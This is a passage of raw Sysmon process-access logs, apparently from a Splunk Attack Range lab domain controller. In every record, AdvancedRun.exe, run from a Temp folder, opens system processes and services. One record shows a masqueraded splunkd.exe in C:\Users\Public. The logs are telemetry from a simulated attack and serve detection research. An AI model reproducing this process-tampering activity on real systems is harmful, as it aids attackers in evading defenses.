dministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075329Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.062{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075328Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.061{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075327Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.061{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075326Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.061{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075325Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.061{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075324Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.060{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075323Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.060{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075322Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.060{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075321Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.060{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075320Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.060{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075319Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075318Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075317Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075316Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075315Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075309Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075304Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075301Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
